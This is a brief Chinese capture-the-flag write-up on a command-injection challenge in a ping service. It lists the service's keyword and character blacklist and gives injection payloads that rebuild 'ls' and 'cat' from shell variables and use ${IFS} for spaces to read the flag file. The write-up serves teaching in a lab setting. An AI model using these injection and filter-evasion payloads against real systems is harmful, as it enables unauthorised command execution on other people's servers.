中学生CTF 平台Ping Write Up

地址：http://198.13.45.199:5005/

 

明显是一道命令执行的题目。

 

来说一下被ban的内容都有啥。

ls、cat、flag、php、>、|    以及数字点和空格

 

 

 

通过反引号包裹whoami后成功执行。

此时需要通过a="l";b="s";c=$a$b;$c来执行ls命令。

同时还需要包含在反引号内

127.0.0.1;`a="l";b="s";c=$a$b;$c`

flag文件近在咫尺。

flag_ae8e4cd6ce3b5

直接访问之后被403拒绝，只能通过cat读取了。

127.0.0.1;`a="ca";b="t${IFS}fla";c="g_ae8e4cd6ce3b5";d=$a$b$c;$d`

 

因为flag和cat不能出现所以我们进行了一个拼接，而${IFS}是对空格进行一个取代作用。